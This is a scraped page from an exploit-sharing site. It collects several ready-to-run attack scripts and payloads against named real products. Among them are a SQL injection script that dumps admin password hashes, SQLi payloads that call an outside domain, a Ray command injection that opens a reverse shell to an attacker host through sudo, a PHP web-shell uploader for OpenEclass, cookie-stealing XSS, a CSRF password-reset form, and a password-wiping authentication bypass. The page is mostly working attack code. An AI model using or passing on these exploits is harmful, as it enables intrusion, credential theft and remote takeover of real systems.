+ ' --> {}[Successfully]'.format(fg)) open('dummyyummy.txt', 'a').write(url + '/wp-content/plugins/dummyyummy/wp-signup.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) except Exception as e: print(f' -| {url} --> {fr}[Failed] due to: {e}') def main(): try: url_file_path = sys.argv[1] except IndexError: url_file_path = input(f"{info_color}Enter the path to the file containing URLs: ") if not os.path.isfile(url_file_path): print(f"{error_color}[ERROR] The specified file path is invalid.") sys.exit(1) try: urls_to_check = [line.strip() for line in open(url_file_path, 'r', encoding='utf-8').readlines()] except Exception as e: print(f"{error_color}[ERROR] An error occurred while reading the file: {e}") sys.exit(1) pool = ThreadPool(20) pool.map(check_security, urls_to_check) pool.close() pool.join() print(f"{info_color}Security check process completed successfully. Results are saved in corresponding files.") if __name__ == "__main__": main()
HireHackking

Best Student Result Management System v1.0 - Multiple SQLi

HACKER · %s · %s

## Title: Best Student Result Management System v1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 04/08/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The nid parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+' was submitted in the nid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: nid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM (SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL# --- ```
HireHackking

Open Source Medicine Ordering System v1.0 - SQLi

HACKER · %s · %s

# Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi # Author : Onur Karasalihoğlu # Date : 27/02/2024 # Sample Usage % python3 omos_sqli_exploit.py https://target.com Available Databases: 1. information_schema 2. omosdb Please select a database to use (enter number): 2 You selected: omosdb Extracted Admin Users Data: 1 | Adminstrator | Admin | | 0192023a7bbd73250516f069df18b500 | admin 2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith ''' import requests import re import sys def fetch_database_names(domain): url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',schema_name)),'enforsec')%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-" try: # HTTP request response = requests.get(url) response.raise_for_status() # exception for 4xx and 5xx requests # data extraction pattern = re.compile(r'enforsec\["(.*?)"\]enforsec') extracted_data = pattern.search(response.text) if extracted_data: databases = extracted_data.group(1).split(',') databases = [db.replace('"', '') for db in databases] print("Available Databases:") for i, db in enumerate(databases, start=1): print(f"{i}. {db}") # users should select omos database choice = int(input("Please select a database to use (enter number): ")) if 0 < choice <= len(databases): selected_db = databases[choice - 1] print(f"You selected: {selected_db}") fetch_data(domain, selected_db) else: print("Invalid selection.") else: print("No data extracted.") except requests.RequestException as e: print(f"HTTP Request failed: {e}") def fetch_data(domain, database_name): url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -" try: # HTTP request response = requests.get(url) response.raise_for_status() # exception for 4xx and 5xx requests # data extraction pattern = re.compile(r'enforsec\[(.*?)\]enforsec') extracted_data = pattern.search(response.text) if extracted_data: print("Extracted Admin Users Data:") data = extracted_data.group(1) rows = data.split('","') for row in rows: clean_row = row.replace('"', '') user_details = clean_row.split(',') print(" | ".join(user_details)) else: print("No data extracted.") except requests.RequestException as e: print(f"HTTP Request failed: {e}") def main(): if len(sys.argv) != 2: print("Usage: python3 omos_sqli_exploit.py <domain>") sys.exit(1) fetch_database_names(sys.argv[1]) if __name__ == "__main__": main()
HireHackking

Terratec dmx_6fire USB - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Terratec dmx_6fire USB - Unquoted Service Path # Google Dork: null # Date: 4/10/2024 # Exploit Author: Joseph Kwabena Fiagbor # Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/ # Software Link: # Version: v.1.23.0.02 # Tested on: windows 7-11 # CVE : CVE-2024-31804 1. Description: The Terratec dmx_6fire usb installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof > C:\Users\Astra>sc qc "ttdmx6firesvc" > {SC] QueryServiceConfig SUCCESS > > SERVICE_NAME: ttdmx6firesvc > TYPE : 10 WIN32_OWN_PROCESS > START_TYPE : 2 AUTO_START > ERROR_CONTROL : 1 NORMAL > BINARY_PATH_NAME : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service > LOAD_ORDER_GROUP : PlugPlay > TAG : 0 > DISPLAY_NAME : DMX6Fire Control > DEPENDENCIES : eventlog > : PlugPlay > SERVICE_START_NAME : LocalSystem > >
HireHackking
# Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS) # Date: 22 March 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.32 # Proof Of Concept: 1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID". # PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns # Vulnerable Properties name: name, playlist_id # Payload: "><script>alert(document.cookie)</script> # Request: POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2 Host: erdemstar.local Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9 Content-Length: 178 Cache-Control: max-age=0 Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 Origin: https://erdemstar.local Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i _wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000
HireHackking

Ray OS v2.6.3 - Command Injection RCE(Unauthorized)

HACKER · %s · %s

# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized) # Description: # The Ray Project dashboard contains a CPU profiling page, and the format parameter is # not validated before being inserted into a system command executed in a shell, allowing # for arbitrary command execution. If the system is configured to allow passwordless sudo # (a setup some Ray configurations require) this will result in a root shell being returned # to the user. If not configured, a user level shell will be returned # Version: <= 2.6.3 # Date: 2024-4-10 # Exploit Author: Fire_Wolf # Tested on: Ubuntu 20.04.6 LTS # Vendor Homepage: https://www.ray.io/ # Software Link: https://github.com/ray-project/ray # CVE: CVE-2023-6019 # Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe # ========================================================================================== # !usr/bin/python3 # coding=utf-8 import base64 import argparse import requests import urllib3 proxies = {"http": "127.0.0.1:8080"} headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" } def check_url(target, port): target_url = target + ":" + port https = 0 if 'http' not in target: try: urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) test_url = 'http://' + target_url response = requests.get(url=test_url, headers=headers, verify=False, timeout=3) if response.status_code != 200: is_https = 0 return is_https except Exception as e: print("ERROR! The Exception is:" + format(e)) if https == 1: return "https://" + target_url else: return "http://" + target_url def exp(target,ip,lhost, lport): payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\'' print("[*]Payload is: " + payload) b64_payload = base64.b64encode(payload.encode()) print("[*]Base64 encoding payload is: " + b64_payload.decode()) exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`' # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess) print(exp_url) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) response = requests.get(url=exp_url, headers=headers, verify=False) if response.status_code == 200: print("[-]ERROR: Exploit Failed,please check the payload.") else: print("[+]Exploit is finished,please check your machine!") if __name__ == '__main__': parser = argparse.ArgumentParser( description=''' ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀ ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄ ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄ ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃ ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄ ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄ ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀ ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄ ''', formatter_class=argparse.RawDescriptionHelpFormatter, ) parser.add_argument('-t', '--target', type=str, required=True, help='tart ip') parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port') parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip') parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port') args = parser.parse_args() # target = args.target ip = args.target # port = args.port # lhost = args.lhost # lport = args.lport targeturl = check_url(args.target, args.port) print(targeturl) print("[*] Checking in url: " + targeturl) exp(targeturl, ip, args.lhost, args.lport)
HireHackking

PrusaSlicer 2.6.1 - Arbitrary code execution

HACKER · %s · %s

# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export # Date: 16/01/2024 # Exploit Author: Kamil Breński # Vendor Homepage: https://www.prusa3d.com # Software Link: https://github.com/prusa3d/PrusaSlicer # Version: PrusaSlicer up to and including version 2.6.1 # Tested on: Windows and Linux # CVE: CVE-2023-47268 ========================================================================================== 1.) 3mf Metadata extension ========================================================================================== PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way. ========================================================================================== 2.) PoC ========================================================================================== For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file: ``` ; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #" ``` Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code. For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry: ``` ; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) " ```
HireHackking

Casdoor < v1.331.0 - '/api/set-password' CSRF

HACKER · %s · %s

# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF # Application: Casdoor # Version: <= 1.331.0 # Date: 03/07/2024 # Exploit Author: Van Lam Nguyen # Vendor Homepage: https://casdoor.org/ # Software Link: https://github.com/casdoor/casdoor # Tested on: Windows # CVE : CVE-2023-34927 Overview ================================================== Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL. Proof of Concept ================================================== Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step <html> <form action="http://localhost:8000/api/set-password" method="POST"> <input name='userOwner' value='built&#45;in' type='hidden'> <input name='userName' value='admin' type='hidden'> <input name='newPassword' value='hacked' type='hidden'> <input type=submit> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </html> If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials userOwner: built&#45;in userName: admin newPassword: hacked
HireHackking

ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Exploit Date: 2024-04-01 # Vendor : https://www.eset.com # Version : 17.0.16.0 # Tested on OS: Microsoft Windows 10 pro x64 C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET Security\ekrn.exe C:\>sc qc ekrn [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ekrn TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe" LOAD_ORDER_GROUP : Base TAG : 0 DISPLAY_NAME : ESET Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation
HireHackking
# Exploit Title: Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass # Author: LiquidWorm # Vendor: Positron srl # Product web page: https://www.positron.it # https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/ # Affected version: 1.20 # TRA7K5_REV107 # TRA7K5_REV106 # TRA7K5_REV104 # TRA7K5_REV102 # # Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to # guarantee an excellent quality-price ratio in compliance with current regulations and # intended for individual broadcasters or radio networks. All models in the TRA7000 series # are fully digital, using only high-quality components such as 24-bit A/D and D/A converters # and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output # MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper # for both analogue and digital audio inputs, change-over emergency switching between any # input with adjustable thresholds and intervention times, both in the switching phase on # the secondary source and in the return phase to the primary source. Ethernet connection # with Web-Server (optional) for total control and management of the device. Advanced BYPASS # system between MPX input and outputs, active on operating and power supply anomalies and # can also be activated remotely. # # Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication # bypass through a direct and unauthorized access to the password management functionality. # The vulnerability allows attackers to bypass Digest authentication by manipulating the # password endpoint _Passwd.html and its payload data to set a user's password to arbitrary # value or remove it entirely. This grants unauthorized access to protected areas (/user, # /operator, /admin) of the application without requiring valid credentials, compromising # the device's system security. # # Tested on: Positron Web Server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2024-5813 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php # # # 22.03.2024 # # import requests,sys print(""" ______________________________________ ┏┳┓• ┏┓ ┓ ┏┓ ┓ • ┃ ┓┏┓┓┏ ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫ ┣ ┓┏┏┓┃┏┓┓╋ ┻ ┗┛┗┗┫ ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻ ┗┛┛┗┣┛┗┗┛┗┗ ┛ ┛ for Positron Digital Signal Processor ZSL-2024-5813 ______________________________________ """) if len(sys.argv) != 4: print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>") sys.exit(1) ip = sys.argv[1] ut = sys.argv[2] wa = sys.argv[3] valid_ut = ['user', 'oper', 'admin'] if ut.lower() not in valid_ut: print("Invalid user type! Use 'user', 'oper', or 'admin'.") sys.exit(1) url = f'http://{ip}/_Passwd.html' did = f'http://{ip}/_Device.html' try: r = requests.get(did) if r.status_code == 200 and 'TRA7K5' in r.text: print("Vulnerable processor found!") else: print("Not Vulnerable or not applicable. Exploit exiting.") sys.exit(1) except requests.exceptions.RequestException as e: print(f"Error checking device: {e}") sys.exit(1) headers = { 'Content-Type' : 'application/x-www-form-urlencoded', 'Accept-Language': 'mk-MK,en;q=0.6', 'Accept-Encoding': 'gzip, deflate', 'User-Agent' : 'R-Marina/11.9', 'Accept' : '*/*' } payload = {} if wa.lower() == 'erase': payload[f'PSW_{ut.capitalize()}'] = 'NONE' else: payload_key = f'PSW_{ut.capitalize()}' payload[payload_key] = wa #print(payload) r = requests.post(url, headers=headers, data=payload) print(r.status_code) print(r.text)
HireHackking
# Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS) # Date: 22 March 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.3.1 # Proof Of Concept: 1. Click Add New Watermark and enter the XSS payload into the Watermark Text. 2. Stored XSS will run on anyone who wants to edit this page. # Vulnerable Property: watermark_title # PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp # Request: POST /wp-admin/post.php HTTP/2 Host: erdemstar.local Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22f539fc8630599f2503d02a6c1a7e678; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wp-settings-time-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7Cdae14d9d9aa7f0c4df03783bb2bd321a5b3d6a63d8c3e1ae131dda689c595862; wp-settings-time-5=1711124723 Content-Length: 1460 Upgrade-Insecure-Requests: 1 Origin: https://erdemstar.local Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: https://erdemstar.local/wp-admin/post-new.php?post_type=watermark&wp-post-new-reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i _wpnonce=99a1d1e63a&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dwatermark&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=watermark&original_post_status=auto-draft&referredby=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&_wp_original_http_referer=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&auto_draft=1&post_ID=35&meta-box-order-nonce=ea875c0c6f&closedpostboxesnonce=d29be25ad8&post_title=&samplepermalinknonce=1e667edd3a&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=03&jj=22&aa=2024&hh=16&mn=25&ss=23&hidden_mm=03&cur_mm=03&hidden_jj=22&cur_jj=22&hidden_aa=2024&cur_aa=2024&hidden_hh=16&cur_hh=16&hidden_mn=25&cur_mn=25&original_publish=Publish&publish=Publish&tax_input%5BCategories%5D%5B%5D=0&post_name=&custom_meta_box_nonce=d1322f94a0&watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&img_sizes%5B%5D=thumbnail&img_sizes%5B%5D=medium&img_sizes%5B%5D=large&img_sizes%5B%5D=full&txt_type=ARIAL.TTF&rgb=38%2C1%2C24&txt_size=8&color=%23260118&rotation=&opicity=100&position=top&destance_x=&mesaure_x=px&padding=&mesaure_y=px&background=yes&rgb_bg=255%2C0%2C0&bg_destance_x=&bg_padding=&color_bg=%23ff0000&image=&img_rotation=&img_opicity=100&img_position=top&img_size=4&img_destance_x=&img_mesaure_x=px&img_padding=&img_mesaure_y=px
HireHackking

AnyDesk 7.0.15 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path # Date: 2024-04-01 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: http://anydesk.com # Software Link: http://anydesk.com/download # Version: Software Version 7.0.15 # Tested on: Windows 10 Pro x64 1. Description: The Anydesk installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof C:\>sc qc anydesk [SC] QueryServiceConfig SUCCESS SERVICE_NAME: anydesk TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : AnyDesk Service DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation
HireHackking
# Exploit Title: GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload # Date: 2024-02-04 # Exploit Author: Georgios Tsimpidas # Vendor Homepage: https://www.openeclass.org/ # Software Link: https://download.openeclass.org/files/3.15/ # Version: 3.15 (2024) # Tested on: Debian Kali (Apache/2.4.57, PHP 8.2.12, MySQL 15.1) # CVE : CVE-2024-31777 # GUnet OpenEclass <= 3.15 E-learning platform - Unrestricted File import requests import argparse import zipfile import os import sys RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' RESET = '\033[0m' ORANGE = '\033[38;5;208m' MALICIOUS_PAYLOAD = """\ <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; } ?> """ def banner(): print(f'''{RED} {YELLOW} ============================ Author: Frey ============================ {RESET}''') def execute_command(openeclass, filename): while True: # Prompt for user input with "eclass" cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}") # Check if the command is 'quit', then break the loop if cmd.lower() == "quit": print(f"{ORANGE}\nExiting...{RESET}") clean_server(openeclass) sys.exit() # Construct the URL with the user-provided command url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}" # Execute the GET request try: response = requests.get(url) # Check if the request was successful if response.status_code == 200: # Print the response text print(f"{GREEN}{response.text}{RESET}") except requests.exceptions.RequestException as e: # Print any error that occurs during the request print(f"{RED}An error occurred: {e}{RESET}") def upload_web_shell(openeclass, username, password): login_url = f'{openeclass}/?login_page=1' login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php' # Login credentials payload = { 'next': '/main/portfolio.php', 'uname': f'{username}', 'pass': f'{password}', 'submit': 'Enter' } headers = { 'Referer': login_page_url, } # Use a session to ensure cookies are handled correctly with requests.Session() as session: # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens session.get(login_page_url) # Post the login credentials response = session.post(login_url, headers=headers, data=payload) # Create a zip file containing the malicious payload zip_file_path = 'malicious_payload.zip' with zipfile.ZipFile(zip_file_path, 'w') as zipf: zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode()) # Upload the zip file url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert' files = { 'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'), 'certhtmlfile': (None, ''), 'orientation': (None, 'L'), 'description': (None, ''), 'cert_id': (None, ''), 'submit_cert_template': (None, '') } response = session.post(url, files=files) # Clean up the zip file os.remove(zip_file_path) # Check if the upload was successful if response.status_code == 200: print(f"{GREEN}Payload uploaded successfully!{RESET}") return True else: print(f"{RED}Failed to upload payload. Exiting...{RESET}") return False def clean_server(openeclass): print(f"{ORANGE}Cleaning server...{RESET}") # Remove the uploaded files requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip") requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php") print(f"{GREEN}Server cleaned successfully!{RESET}") def main(): parser = argparse.ArgumentParser(description="Open eClass – CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution") parser.add_argument('-u', '--username', required=True, help="Username for login") parser.add_argument('-p', '--password', required=True, help="Password for login") parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass") args = parser.parse_args() banner() # Running the main login and execute command function if upload_web_shell(args.eclass, args.username, args.password): execute_command(args.eclass, 'evil.php') if __name__ == "__main__": main()
HireHackking

Daily Expense Manager 1.0 - 'term' SQLi

HACKER · %s · %s

